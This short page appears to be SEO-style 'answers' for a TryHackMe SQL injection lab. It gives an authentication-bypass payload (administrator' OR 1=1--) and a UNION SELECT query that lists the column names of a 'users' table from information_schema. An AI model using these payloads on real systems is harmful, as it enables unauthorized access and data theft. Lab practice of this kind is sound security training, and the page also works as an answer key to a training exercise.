Tryhackme Sql Injection Lab Answers Link
Let's assume we found a table named users . We now need to know the column names inside that table to extract the data.
administrator' OR 1=1--
' UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name = 'users'-- tryhackme sql injection lab answers